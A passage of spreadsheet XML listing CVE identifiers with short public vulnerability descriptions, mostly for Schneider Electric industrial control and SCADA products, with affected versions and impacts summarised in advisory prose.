    <t>In certain situations, all versions of Citrix ShareFile StorageZones (aka storage zones) Controller, including the most recent 5.10.x releases as of May 2020, allow unauthenticated attackers to access the documents and folders of ShareFile users. NOTE: unlike most CVEs, exploitability depends on the product version that was in use when a particular setup step was performed, NOT the product version that is in use during a current assessment of a CVE consumer's product inventory. Specifically, the vulnerability can be exploited if a storage zone was created by one of these product versions: 5.9.0, 5.8.0, 5.7.0, 5.6.0, 5.5.0, or earlier. This CVE differs from CVE-2020-8982 and CVE-2020-8983 but has essentially the same risk.</t>
  </si>
  <si>
    <t>CVE-2020-7474</t>
  </si>
  <si>
    <t>A CWE-427: Uncontrolled Search Path Element vulnerability exists in ProSoft Configurator (v1.002 and prior), for the PMEPXM0100 (H) module, which could cause the execution of untrusted code when using double click to open a project file which may trigger execution of a malicious DLL.</t>
  </si>
  <si>
    <t>CVE-2020-7475</t>
  </si>
  <si>
    <t>A CWE-74: Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection'), reflective DLL, vulnerability exists in EcoStruxure Control Expert (all versions prior to 14.1 Hot Fix), Unity Pro (all versions), Modicon M340 (all versions prior to V3.20), Modicon M580 (all versions prior to V3.10), which, if exploited, could allow attackers to transfer malicious code to the controller.</t>
  </si>
  <si>
    <t>CVE-2020-7476</t>
  </si>
  <si>
    <t>A CWE-426: Untrusted Search Path vulnerability exists in ZigBee Installation Kit (Versions prior to 1.0.1), which could cause execution of malicious code when a malicious file is put in the search path.</t>
  </si>
  <si>
    <t>CVE-2020-7477</t>
  </si>
  <si>
    <t>A CWE-754: Improper Check for Unusual or Exceptional Conditions vulnerability exists in Quantum Ethernet Network module 140NOE771x1 (Versions 7.0 and prior), Quantum processors with integrated Ethernet – 140CPU65xxxxx (all Versions), and Premium processors with integrated Ethernet (all Versions), which could cause a Denial of Service when sending a specially crafted command over Modbus.</t>
  </si>
  <si>
    <t>CVE-2020-7478</t>
  </si>
  <si>
    <t>A CWE-22: Improper Limitation of a Pathname to a Restricted Directory exists in IGSS (Versions 14 and prior using the service: IGSSupdate), which could allow a remote unauthenticated attacker to read arbitrary files from the IGSS server PC on an unrestricted or shared network when the IGSS Update Service is enabled.</t>
  </si>
  <si>
    <t>CVE-2020-7479</t>
  </si>
  <si>
    <t>A CWE-306: Missing Authentication for Critical Function vulnerability exists in IGSS (Versions 14 and prior using the service: IGSSupdate), which could allow a local user to execute processes that otherwise require escalation privileges when sending local network commands to the IGSS Update Service.</t>
  </si>
  <si>
    <t>CVE-2020-7480</t>
  </si>
  <si>
    <t>A CWE-94: Improper Control of Generation of Code ('Code Injection') vulnerability exists in Andover Continuum (All versions), which could cause files on the application server filesystem to be viewable when an attacker interferes with an application's processing of XML data.</t>
  </si>
  <si>
    <t>CVE-2020-7481</t>
  </si>
  <si>
    <t>A CWE-79:Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability exists Andover Continuum (All versions), which could enable a successful Cross-site Scripting (XSS attack) when using the products' web server.</t>
  </si>
  <si>
    <t>CVE-2020-7482</t>
  </si>
  <si>
    <t>A CWE-79:Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability exists Andover Continuum (All versions), which could cause a Reflective Cross-site Scripting (XSS attack) when using the products' web server.</t>
  </si>
  <si>
    <t>CVE-2020-7483</t>
  </si>
  <si>
    <t>**VERSION NOT SUPPORTED WHEN ASSIGNED** A vulnerability could cause certain data to be visible on the network when the 'password' feature is enabled. This vulnerability was discovered in and remediated in versions v4.9.1 and v4.10.1 on May 30, 2013. The 'password' feature is an additional optional check performed by TS1131 that it is connected to a specific controller. This data is sent as clear text and is visible on the network. This feature is not present in TriStation 1131 versions v4.9.1 and v4.10.1 through current. Therefore, the vulnerability is not present in these versions.</t>
  </si>
  <si>
    <t>CVE-2020-7484</t>
  </si>
  <si>
    <t>**VERSION NOT SUPPORTED WHEN ASSIGNED** A vulnerability with the former 'password' feature could allow a denial of service attack if the user is not following documented guidelines pertaining to dedicated TriStation connection and key-switch protection. This vulnerability was discovered and remediated in versions v4.9.1 and v4.10.1 on May 30, 2013. This feature is not present in version v4.9.1 and v4.10.1 through current. Therefore, the vulnerability is not present in these versions.</t>
  </si>
  <si>
    <t>CVE-2020-7485</t>
  </si>
  <si>
    <t>**VERSION NOT SUPPORTED WHEN ASSIGNED** A legacy support account in the TriStation software version v4.9.0 and earlier could cause improper access to the TriStation host machine. This was addressed in TriStation version v4.9.1 and v4.10.1 released on May 30, 2013.1</t>
  </si>
  <si>
    <t>CVE-2020-7486</t>
  </si>
  <si>
    <t>**VERSION NOT SUPPORTED WHEN ASSIGNED** A vulnerability could cause TCM modules to reset when under high network load in TCM v10.4.x and in system v10.3.x. This vulnerability was discovered and remediated in version v10.5.x on August 13, 2009. TCMs from v10.5.x and on will no longer exhibit this behavior.</t>
  </si>
  <si>
    <t>CVE-2020-7487</t>
  </si>
  <si>
    <t>A CWE-345: Insufficient Verification of Data Authenticity vulnerability exists which could allow the attacker to execute malicious code on the Modicon M218, M241, M251, and M258 controllers.</t>
  </si>
  <si>
    <t>CVE-2020-7488</t>
  </si>
  <si>
    <t>A CWE-319: Cleartext Transmission of Sensitive Information vulnerability exists which could leak sensitive information transmitted between the software and the Modicon M218, M241, M251, and M258 controllers.</t>
  </si>
  <si>
    <t>CVE-2020-7489</t>
  </si>
  <si>
    <t>A CWE-74: Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection') vulnerability exists on EcoStruxure Machine Expert – Basic or SoMachine Basic programming software (versions in security notification). The result of this vulnerability, DLL substitution, could allow the transference of malicious code to the controller.</t>
  </si>
  <si>
    <t>CVE-2020-7490</t>
  </si>
  <si>
    <t>A CWE-426: Untrusted Search Path vulnerability exists in Vijeo Designer Basic (V1.1 HotFix 15 and prior) and Vijeo Designer (V6.9 SP9 and prior), which could cause arbitrary code execution on the system running Vijeo Basic when a malicious DLL library is loaded by the Product.</t>
  </si>
  <si>
    <t>CVE-2020-7491</t>
  </si>
  <si>
    <t>**VERSION NOT SUPPORTED WHEN ASSIGNED** A legacy debug port account in TCMs installed in Tricon system versions 10.2.0 through 10.5.3 is visible on the network and could allow inappropriate access. This vulnerability was remediated in TCM version 10.5.4.</t>
  </si>
  <si>
    <t>CVE-2020-7492</t>
  </si>
  <si>
    <t>A CWE-521: Weak Password Requirements vulnerability exists in the GP-Pro EX V1.00 to V4.09.100 which could cause the discovery of the password when the user is entering the password because it is not masqueraded.</t>
  </si>
  <si>
    <t>CVE-2020-7493</t>
  </si>
  <si>
    <t>A CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability exists in EcoStruxure Operator Terminal Expert 3.1 Service Pack 1 and prior (formerly known as Vijeo XD) which could cause malicious code execution when opening the project file.</t>
  </si>
  <si>
    <t>CVE-2020-7494</t>
  </si>
  <si>
    <t>A CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability exists in EcoStruxure Operator Terminal Expert 3.1 Service Pack 1 and prior (formerly known as Vijeo XD) which could cause malicious code execution when opening the project file.</t>
  </si>
  <si>
    <t>CVE-2020-7495</t>
  </si>
  <si>
    <t>A CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability during zip file extraction exists in EcoStruxure Operator Terminal Expert 3.1 Service Pack 1 and prior (formerly known as Vijeo XD) which could cause unauthorized write access outside of expected path folder when opening the project file.</t>
  </si>
  <si>
    <t>CVE-2020-7496</t>
  </si>
  <si>
    <t>A CWE-88: Argument Injection or Modification vulnerability exists in EcoStruxure Operator Terminal Expert 3.1 Service Pack 1 and prior (formerly known as Vijeo XD)which could cause unauthorized write access when opening the project file.</t>
  </si>
  <si>
    <t>CVE-2020-7497</t>
  </si>
  <si>
    <t>A CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability exists in EcoStruxure Operator Terminal Expert 3.1 Service Pack 1 and prior (formerly known as Vijeo XD)which could cause arbitrary application execution when the computer starts.</t>
  </si>
  <si>
    <t>CVE-2020-7498</t>
  </si>
  <si>
    <t>A CWE-798: Use of Hard-coded Credentials vulnerability exists in the Unity Loader and OS Loader Software (all versions). The fixed credentials are used to simplify file transfer. Today the use of fixed credentials is considered a vulnerability, which could cause unauthorized access to the file transfer service provided by the Modicon PLCs. This could result in various unintended results.</t>
  </si>
  <si>
    <t>CVE-2020-7499</t>
  </si>
  <si>
    <t>A CWE-863: Incorrect Authorization vulnerability exists in U.motion Servers and Touch Panels (affected versions listed in the security notification) which could cause unauthorized access when a low privileged user makes unauthorized changes.</t>
  </si>
  <si>
    <t>CVE-2020-7500</t>
  </si>
  <si>
    <t>A CWE-89:Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability exists in U.motion Servers and Touch Panels (affected versions listed in the security notification) which could cause arbitrary code to be executed when a malicious command is entered.</t>
  </si>
  <si>
    <t>CVE-2020-7501</t>
  </si>
  <si>
    <t>A CWE-798: Use of Hard-coded Credentials vulnerability exists in Vijeo Designer Basic (V1.1 HotFix 16 and prior) and Vijeo Designer (V6.2 SP9 and prior) which could cause unauthorized read and write when downloading and uploading project or firmware into Vijeo Designer Basic and Vijeo Designer.</t>
  </si>
  <si>
    <t>CVE-2020-7502</t>
  </si>
  <si>
    <t>A CWE-787: Out-of-bounds Write vulnerability exists in Modicon M218 Logic Controller (Firmware version 4.3 and prior), which may cause a Denial of Service when specific TCP/IP crafted packets are sent to the Modicon M218 Logic Controller.</t>
  </si>
  <si>
    <t>CVE-2020-7503</t>
  </si>
  <si>
    <t>A CWE-352: Cross-Site Request Forgery (CSRF) vulnerability exists in Easergy T300 (Firmware version 1.5.2 and older) which could allow an attacker to execute malicious commands on behalf of a legitimate user when xsrf-token data is intercepted.</t>
  </si>
  <si>
    <t>CVE-2020-7504</t>
  </si>
  <si>
    <t>A CWE-20: Improper Input Validation vulnerability exists in Easergy T300 (Firmware version 1.5.2 and older) which could allow an attacker to disable the webserver service on the device when specially crafted network packets are sent.</t>
  </si>
  <si>
    <t>CVE-2020-7505</t>
  </si>
  <si>
    <t>A CWE-494 Download of Code Without Integrity Check vulnerability exists in Easergy T300 (Firmware version 1.5.2 and older) which could allow an attacker to inject data with dangerous content into the firmware and execute arbitrary code on the system.</t>
  </si>
  <si>
    <t>CVE-2020-7506</t>
  </si>
  <si>
    <t>A CWE-200: Information Exposure vulnerability exists in Easergy T300, Firmware V1.5.2 and prior, which could allow an attacker to pack or unpack the archive with the firmware for the controller and modules using the usual tar archiver resulting in an information exposure.</t>
  </si>
  <si>
    <t>CVE-2020-7507</t>
  </si>
  <si>
    <t>A CWE-400: Uncontrolled Resource Consumption vulnerability exists in Easergy T300 (Firmware version 1.5.2 and older) which could allow an attacker to login multiple times resulting in a denial of service.</t>
  </si>
  <si>
    <t>CVE-2020-7508</t>
  </si>
  <si>
    <t>A CWE-307 Improper Restriction of Excessive Authentication Attempts vulnerability exists in Easergy T300 (Firmware version 1.5.2 and older) which could allow an attacker to gain full access by brute force.</t>
  </si>
  <si>
    <t>CVE-2020-7509</t>
  </si>
  <si>
    <t>A CWE-269: Improper privilege management (write) vulnerability exists in Easergy T300 (Firmware version 1.5.2 and older) which could allow an attacker to elevate their privileges and delete files.</t>
  </si>
  <si>
    <t>CVE-2020-7510</t>
  </si>
  <si>
    <t>A CWE-200: Information Exposure vulnerability exists in Easergy T300 (Firmware version 1.5.2 and older) which could allow attacker to obtain private keys.</t>
  </si>
  <si>
    <t>CVE-2020-7511</t>
  </si>
  <si>
    <t>A CWE-327: Use of a Broken or Risky Cryptographic Algorithm vulnerability exists in Easergy T300 (Firmware version 1.5.2 and older) which could allow an attacker to acquire a password by brute force.</t>
  </si>
  <si>
    <t>CVE-2020-7512</t>
  </si>
  <si>
    <t>A CWE-1103: Use of Platform-Dependent Third Party Components with vulnerabilities vulnerability exists in Easergy T300 (Firmware version 1.5.2 and older) which could allow an attacker to exploit the component.</t>
  </si>
  <si>
    <t>CVE-2020-7513</t>
  </si>
  <si>
    <t>A CWE-312: Cleartext Storage of Sensitive Information vulnerability exists in Easergy T300 (Firmware version 1.5.2 and older) which could allow an attacker to intercept traffic and read configuration data.</t>
  </si>
  <si>
    <t>CVE-2020-7514</t>
  </si>
  <si>
    <t>A CWE-327: Use of a Broken or Risky Cryptographic Algorithm vulnerability exists in Easergy Builder (Version 1.4.7.2 and older) which could allow an attacker access to the authorization credentials for a device and gain full access.</t>
  </si>
  <si>
    <t>CVE-2020-7515</t>
  </si>
  <si>
    <t>A CWE-321: Use of hard-coded cryptographic key stored in cleartext vulnerability exists in Easergy Builder V1.4.7.2 and prior which could allow an attacker to decrypt a password.</t>
  </si>
  <si>
    <t>CVE-2020-7516</t>
  </si>
  <si>
    <t>A CWE-316: Cleartext Storage of Sensitive Information in Memory vulnerability exists in Easergy Builder V1.4.7.2 and prior which could allow an attacker access to login credentials.</t>
  </si>
  <si>
    <t>CVE-2020-7517</t>
  </si>
  <si>
    <t>A CWE-312: Cleartext Storage of Sensitive Information vulnerability exists in Easergy Builder (Version 1.4.7.2 and older) which could allow an attacker to read user credentials.</t>
  </si>
  <si>
    <t>CVE-2020-7518</t>
  </si>
  <si>
    <t>A CWE-20: Improper input validation vulnerability exists in Easergy Builder (Version 1.4.7.2 and older) which could allow an attacker to modify project configuration files.</t>
  </si>
  <si>
    <t>CVE-2020-7519</t>
  </si>
  <si>
    <t>A CWE-521: Weak Password Requirements vulnerability exists in Easergy Builder (Version 1.4.7.2 and older) which could allow an attacker to compromise a user account.</t>
  </si>
  <si>
    <t>CVE-2020-7520</t>
  </si>
  <si>
    <t>A CWE-601: URL Redirection to Untrusted Site ('Open Redirect') vulnerability exists in Schneider Electric Software Update (SESU), V2.4.0 and prior, which could cause execution of malicious code on the victim's machine. In order to exploit this vulnerability, an attacker requires privileged access on the engineering workstation to modify a Windows registry key which would divert all traffic updates to go through a server in the attacker's possession. A man-in-the-middle attack is then used to complete the exploit.</t>
  </si>
  <si>
    <t>CVE-2020-7521</t>
  </si>
  <si>
    <t>Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability exists in SFAPV9601 - APC Easy UPS On-Line Software (V2.0 and earlier) when accessing a vulnerable method of `FileUploadServlet` which may lead to uploading executable files to non-specified directories.</t>
  </si>
  <si>
    <t>CVE-2020-7522</t>
  </si>
  <si>
    <t>Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability exists in SFAPV9601 - APC Easy UPS On-Line Software (V2.0 and earlier) when accessing a vulnerable method of `SoundUploadServlet` which may lead to uploading executable files to non-specified directories.</t>
  </si>
  <si>
    <t>CVE-2020-7523</t>
  </si>
  <si>
    <t>Improper Privilege Management vulnerability exists in Schneider Electric Modbus Serial Driver (see security notification for versions) which could cause local privilege escalation when the Modbus Serial Driver service is invoked. The driver does not properly assign, modify, track, or check privileges for an actor, creating an unintended sphere of control for that actor.</t>
  </si>
  <si>
    <t>CVE-2020-7524</t>
  </si>
  <si>
    <t>Out-of-bounds Write vulnerability exists in Modicon M218 Logic Controller (V5.0.0.7 and prior) which could cause Denial of Service when sending specific crafted IPV4 packet to the controller: Sending a specific IPv4 protocol package to Schneider Electric Modicon M218 Logic Controller can cause IPv4 devices to go down. The device does not work properly and must be powered back on to return to normal.</t>
  </si>
  <si>
    <t>CVE-2020-7525</t>
  </si>
  <si>
    <t>Improper Restriction of Excessive Authentication Attempts vulnerability exists in all hardware versions of spaceLYnk and Wiser for KNX (formerly homeLYnk) which could allow an attacker to guess a password when brute force is used.</t>
  </si>
  <si>
    <t>CVE-2020-7526</t>
  </si>
  <si>
    <t>Improper Input Validation vulnerability exists in PowerChute Business Edition (software V9.0.x and earlier) which could cause remote code execution when a script is executed during a shutdown event.</t>
  </si>
  <si>
    <t>CVE-2020-7527</t>
  </si>
  <si>
    <t>Incorrect Default Permission vulnerability exists in SoMove (V2.8.1) and prior which could cause elevation of privilege and provide full access control to local system users to SoMove component and services when a SoMove installer script is launched.</t>
  </si>
  <si>
    <t>CVE-2020-7528</t>
  </si>
  <si>
    <t>A CWE-502 Deserialization of Untrusted Data vulnerability exists in SCADAPack 7x Remote Connect (V3.6.3.574 and prior) which could allow arbitrary code execution when an attacker builds a custom .PRJ file containing a malicious serialized buffer.</t>
  </si>
  <si>
    <t>CVE-2020-7529</t>
  </si>
  <si>
    <t>A CWE-22 Improper Limitation of a Pathname to a Restricted Directory ('Path Transversal') vulnerability exists in SCADAPack 7x Remote Connect (V3.6.3.574 and prior) which allows an attacker to place content in any unprotected folder on the target system using a crafted .RCZ file.</t>
  </si>
  <si>
    <t>CVE-2020-7530</t>
  </si>
  <si>
    <t>A CWE-285 Improper Authorization vulnerability exists in SCADAPack 7x Remote Connect (V3.6.3.574 and prior) which allows improper access to executable code folders.</t>
  </si>
  <si>
    <t>CVE-2020-7531</t>
  </si>
  <si>
    <t>A CWE-284 Improper Access Control vulnerability exists in SCADAPack 7x Remote Connect (V3.6.3.574 and prior) which allows an attacker to place executables in a specific folder and run code whenever RemoteConnect is executed by the user.</t>
  </si>
  <si>
    <t>CVE-2020-7532</t>
  </si>
  <si>
    <t>A CWE-502 Deserialization of Untrusted Data vulnerability exists in SCADAPack x70 Security Administrator (V1.2.0 and prior) which could allow arbitrary code execution when an attacker builds a custom .SDB file containing a malicious serialized buffer.</t>
  </si>
  <si>
    <t>CVE-2020-7533</t>
  </si>
  <si>
    <t>A CWE-255: Credentials Management vulnerability exists in Web Server on Modicon M340, Modicon Quantum and ModiconPremium Legacy offers and their Communication Modules (see security notification for version information) which could cause the execution of commands on the webserver without authentication when sending specially crafted HTTP requests.</t>
  </si>
  <si>
    <t>CVE-2020-7534</t>
  </si>
  <si>
    <t>A CWE-352: Cross-Site Request Forgery (CSRF) vulnerability exists on the web server used, that could cause a leak of sensitive data or unauthorized actions on the web server during the time the user is logged in. Affected Products: Modicon M340 CPUs: BMXP34 (All Versions), Modicon Quantum CPUs with integrated Ethernet (Copro): 140CPU65 (All Versions), Modicon Premium CPUs with integrated Ethernet (Copro): TSXP57 (All Versions), Modicon M340 ethernet modules: (BMXNOC0401, BMXNOE01, BMXNOR0200H) (All Versions), Modicon Quantum and Premium factory cast communication modules: (140NOE77111, 140NOC78*00, TSXETY5103, TSXETY4103) (All Versions)</t>
  </si>
  <si>
    <t>CVE-2020-7535</t>
  </si>
  <si>
    <t>A CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal' Vulnerability Type) vulnerability exists in the Web Server on Modicon M340, Legacy Offers Modicon Quantum and Modicon Premium and associated Communication Modules (see security notification for affected versions), that could cause disclosure of information when sending a specially crafted request to the controller over HTTP.</t>
  </si>
  <si>
    <t>CVE-2020-7536</t>
  </si>
  <si>
    <t>A CWE-754:Improper Check for Unusual or Exceptional Conditions vulnerability exists in Modicon M340 CPUs (BMXP34* versions prior to V3.30) Modicon M340 Communication Ethernet modules (BMXNOE0100 (H) versions prior to V3.4 BMXNOE0110 (H) versions prior to V6.6 BMXNOR0200H all versions), that could cause the device to be unreachable when modifying network parameters over SNMP.</t>
  </si>
  <si>
    <t>CVE-2020-7537</t>
  </si>
  <si>
    <t>A CWE-754: Improper Check for Unusual or Exceptional Conditions vulnerability exists in Modicon M580, Modicon M340, Legacy Controllers Modicon Quantum &amp; Modicon Premium (see security notifications for affected versions), that could cause denial of service when a specially crafted Read Physical Memory request over Modbus is sent to the controller.</t>
  </si>
  <si>
    <t>CVE-2020-7538</t>
  </si>
  <si>
    <t>A CWE-754: Improper Check for Unusual or Exceptional Conditions vulnerability exists in PLC Simulator on EcoStruxureª Control Expert (now Unity Pro) (all versions) that could cause a crash of the PLC simulator present in EcoStruxureª Control Expert software when receiving a specially crafted request over Modbus.</t>
  </si>
  <si>
    <t>CVE-2020-7539</t>
  </si>
  <si>
    <t>A CWE-754 Improper Check for Unusual or Exceptional Conditions vulnerability exists in the Web Server on Modicon M340, Legacy Offers Modicon Quantum and Modicon Premium and associated Communication Modules (see security notification for affected versions), that could cause a denial of service vulnerability when a specially crafted packet is sent to the controller over HTTP.</t>
  </si>
  <si>
    <t>CVE-2020-7540</t>
  </si>
  <si>
    <t>A CWE-306: Missing Authentication for Critical Function vulnerability exists in the Web Server on Modicon M340, Legacy Offers Modicon Quantum and Modicon Premium and associated Communication Modules (see security notification for affected versions), that could cause unauthenticated command execution in the controller when sending special HTTP requests.</t>
  </si>
  <si>
    <t>CVE-2020-7541</t>
  </si>
  <si>
    <t>A CWE-425: Direct Request ('Forced Browsing') vulnerability exists in the Web Server on Modicon M340, Legacy Offers Modicon Quantum and Modicon Premium and associated Communication Modules (see security notification for affected versions), that could cause disclosure of sensitive data when sending a specially crafted request to the controller over HTTP.</t>
  </si>
  <si>
    <t>CVE-2020-7542</t>
  </si>
  <si>
    <t>CVE-2020-7543</t>
  </si>
  <si>
    <t>CVE-2020-7544</t>
  </si>
  <si>
    <t>A CWE-269 Improper Privilege Management vulnerability exists in EcoStruxureª Operator Terminal Expert runtime (Vijeo XD) that could cause privilege escalation on the workstation when interacting directly with a driver installed by the runtime software of EcoStruxureª Operator Terminal Expert.</t>
  </si>
  <si>
    <t>CVE-2020-7545</t>
  </si>
  <si>
    <t>A CWE-284:Improper Access Control vulnerability exists in EcoStruxureª and SmartStruxureª Power Monitoring and SCADA Software (see security notification for version information) that could allow for arbitrary code execution on the server when an authorized user access an affected webpage.</t>
  </si>
  <si>
    <t>CVE-2020-7546</t>
  </si>
  <si>
    <t>A CWE-79: Improper Neutralization of Input During Web Page Generation vulnerability exists in EcoStruxureª and SmartStruxureª Power Monitoring and SCADA Software (see security notification for version information) that could allow an attacker to perform actions on behalf of the authorized user when accessing an affected webpage.</t>
  </si>
  <si>
    <t>CVE-2020-7547</t>
  </si>
  <si>
    <t>A CWE-284: Improper Access Control vulnerability exists in EcoStruxureª and SmartStruxureª Power Monitoring and SCADA Software (see security notification for version information) that could allow a user the ability to perform actions via the web interface at a higher privilege level.</t>
  </si>
  <si>
    <t>CVE-2020-7548</t>
  </si>
  <si>
    <t>A CWE-330 - Use of Insufficiently Random Values vulnerability exists in Smartlink, PowerTag, and Wiser Series Gateways (see security notification for version information) that could allow unauthorized users to login.</t>
  </si>
  <si>
    <t>CVE-2020-7549</t>
  </si>
  <si>
    <t>A CWE-754: Improper Check for Unusual or Exceptional Conditions vulnerability exists in the Web Server on Modicon M340, Legacy Offers Modicon Quantum and Modicon Premium and associated Communication Modules (see security notification for affected versions), that could cause denial of HTTP and FTP services when a series of specially crafted requests is sent to the controller over HTTP.</t>
  </si>
  <si>
    <t>CVE-2020-7550</t>
  </si>
  <si>
    <t>A CWE-119 Improper Restriction of Operations within the Bounds of a Memory Buffer vulnerability exists in IGSS Definition (Def.exe) version 14.0.0.20247 and prior that could cause Remote Code Execution when malicious CGF (Configuration Group File) file is imported to IGSS Definition.</t>
  </si>
  <si>
    <t>CVE-2020-7551</t>
  </si>
  <si>
    <t>A CWE-787: Out-of-bounds Write vulnerability exists in IGSS Definition (Def.exe) version 14.0.0.20247, that could cause Remote Code Execution when malicious CGF (Configuration Group File) file is imported to IGSS Definition.</t>
  </si>
  <si>
    <t>CVE-2020-7552</t>
  </si>
  <si>
    <t>CVE-2020-7553</t>
  </si>
  <si>
    <t>A CWE-787 Out-of-bounds Write vulnerability exists in IGSS Definition (Def.exe) version 14.0.0.20247 that could cause Remote Code Execution when malicious CGF (Configuration Group File) file is imported to IGSS Definition.</t>
  </si>
  <si>
    <t>CVE-2020-7554</t>
  </si>
  <si>
    <t>A CWE-119 Improper Restriction of Operations within the Bounds of a Memory Buffer vulnerability exists in IGSS Definition (Def.exe) version 14.0.0.20247 that could cause Remote Code Execution when malicious CGF (Configuration Group File) file is imported to IGSS Definition.</t>
  </si>
  <si>
    <t>CVE-2020-7555</t>
  </si>
  <si>
    <t>CVE-2020-7556</t>
  </si>
  <si>
    <t>CVE-2020-7557</t>
  </si>
  <si>
    <t>A CWE-125 Out-of-bounds Read vulnerability exists in IGSS Definition (Def.exe) version 14.0.0.20247 that could cause Remote Code Execution when malicious CGF (Configuration Group File) file is imported to IGSS Definition.</t>
  </si>
  <si>
    <t>CVE-2020-7558</t>
  </si>
  <si>
    <t>CVE-2020-7559</t>
  </si>
  <si>
    <t>A CWE-120: Buffer Copy without Checking Size of Input ('Classic Buffer Overflow') vulnerability exists in PLC Simulator on EcoStruxureª Control Expert (now Unity Pro) (all versions) that could cause a crash of the PLC simulator present in EcoStruxureª Control Expert software when receiving a specially crafted request over Modbus.</t>
  </si>
  <si>
    <t>CVE-2020-7560</t>
  </si>
  <si>
    <t>A CWE-123: Write-what-where Condition vulnerability exists in EcoStruxure™ Control Expert (all versions) and Unity Pro (former name of EcoStruxure™ Control Expert) (all versions), that could cause a crash of the software or unexpected code execution when opening a malicious file in EcoStruxure™ Control Expert software.</t>
  </si>
  <si>
    <t>CVE-2020-7561</t>
  </si>
  <si>
    <t>A CWE-306: Missing Authentication for Critical Function vulnerability exists in Easergy T300 (with firmware 2.7 and older) that could cause a wide range of problems, including information exposure, denial of service, and command execution when access to a resource from an attacker is not restricted or incorrectly restricted.</t>
  </si>
  <si>
    <t>CVE-2020-7562</t>
  </si>
  <si>
    <t>A CWE-125: Out-of-Bounds Read vulnerability exists in the Web Server on Modicon M340, Modicon Quantum and Modicon Premium Legacy offers and their Communication Modules (see notification for details) which could cause a segmentation fault or a buffer overflow when uploading a specially crafted file on the controller over FTP.</t>
  </si>
  <si>
    <t>CVE-2020-7563</t>
  </si>
  <si>
    <t>A CWE-787: Out-of-bounds Write vulnerability exists in the Web Server on Modicon M340, Modicon Quantum and Modicon Premium Legacy offers and their Communication Modules (see notification for details) which could cause corruption of data, a crash, or code execution when uploading a specially crafted file on the controller over FTP.</t>
  </si>
  <si>
    <t>CVE-2020-7564</t>
  </si>
  <si>
    <t>A CWE-120: Buffer Copy without Checking Size of Input ('Classic Buffer Overflow') vulnerability exists in the Web Server on Modicon M340, Modicon Quantum and Modicon Premium Legacy offers and their Communication Modules (see notification for details) which could cause write access and the execution of commands when uploading a specially crafted file on the controller over FTP.</t>
  </si>
  <si>
    <t>CVE-2020-7565</t>
  </si>
  <si>
    <t>A CWE-326: Inadequate Encryption Strength vulnerability exists in Modicon M221 (all references, all versions) that could allow the attacker to break the encryption key when the attacker has captured the traffic between EcoStruxure Machine - Basic software and Modicon M221 controller.</t>
  </si>
  <si>
    <t>CVSS:3.1/AV:A/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N</t>
  </si>
  <si>
    <t>CVE-2020-7566</t>
  </si>
  <si>
    <t>A CWE-334: Small Space of Random Values vulnerability exists in Modicon M221 (all references, all versions) that could allow the attacker to break the encryption keys when the attacker has captured the traffic between EcoStruxure Machine - Basic software and Modicon M221 controller.</t>
  </si>
  <si>
    <t>334</t>
  </si>
  <si>
    <t>CVE-2020-7567</t>
  </si>
  <si>
    <t>A CWE-311: Missing Encryption of Sensitive Data vulnerability exists in Modicon M221 (all references, all versions) that could allow the attacker to find the password hash when the attacker has captured the traffic between EcoStruxure Machine - Basic software and Modicon M221 controller and broke the encryption keys.</t>
  </si>
  <si>
    <t>CVE-2020-7568</t>
  </si>
  <si>
    <t>A CWE-200: Exposure of Sensitive Information to an Unauthorized Actor vulnerability exists in Modicon M221 (all references, all versions) that could allow non sensitive information disclosure when the attacker has captured the traffic between EcoStruxure Machine - Basic software and Modicon M221 controller.</t>
  </si>
  <si>
    <t>CVE-2020-7569</t>
  </si>
  <si>
    <t>A CWE-434 Unrestricted Upload of File with Dangerous Type vulnerability exists in EcoStruxure Building Operation WebReports V1.9 - V3.1 that could cause an authenticated remote user being able to upload arbitrary files due to incorrect verification of user supplied files and achieve remote code execution.</t>
  </si>
  <si>
    <t>CVE-2020-7570</t>
  </si>
  <si>
    <t>A CWE-79 Improper Neutralization of Input During Web Page Generation (Cross-site Scripting Stored) vulnerability exists in EcoStruxure Building Operation WebReports V1.9 - V3.1 that could cause an authenticated remote user being able to inject arbitrary web script or HTML due to incorrect sanitization of user-supplied data and achieve a Cross-Site Scripting stored attack against other WebReport users.</t>
  </si>
  <si>
    <t>CVE-2020-7571</t>
  </si>
  <si>
    <t>A CWE-79 Multiple Improper Neutralization of Input During Web Page Generation (Cross-site Scripting Reflected) vulnerability exists in EcoStruxure Building Operation WebReports V1.9 - V3.1 that could cause a remote attacker to inject arbitrary web script or HTML due to incorrect sanitization of user supplied data and achieve a Cross-Site Scripting reflected attack against other WebReport users.</t>
  </si>
  <si>
    <t>CVE-2020-7572</t>
  </si>
  <si>
    <t>A CWE-611 Improper Restriction of XML External Entity Reference vulnerability exists in EcoStruxure Building Operation WebReports V1.9 - V3.1 that could cause an authenticated remote user being able to inject arbitrary XML code and obtain disclosure of confidential data, denial of service, server side request forgery due to improper configuration of the XML parser.</t>
  </si>
  <si>
    <t>CVE-2020-7573</t>
  </si>
  <si>
    <t>A CWE-284 Improper Access Control vulnerability exists in EcoStruxure Building Operation WebReports V1.9 - V3.1 that could cause a remote attacker being able to access a restricted web resources due to improper access control.</t>
  </si>
  <si>
    <t>CVE-2020-7574</t>
  </si>
  <si>
    <t>A vulnerability has been identified in Climatix POL908 (BACnet/IP module) (All versions), Climatix POL909 (AWM module) (All versions &lt; V11.32). A persistent cross-site scripting (XSS) vulnerability exists in the "Server Config" web interface of the affected devices that could allow an attacker to inject arbitrary JavaScript code. The code could be potentially executed later by another (possibly privileged) user. The security vulnerability could be exploited by an attacker with network access to the affected system. Successful exploitation requires no system privileges. An attacker could use the vulnerability to compromise the confidentiality and integrity of other users' web session.</t>
  </si>
  <si>
    <t>CVE-2020-7575</t>
  </si>
  <si>
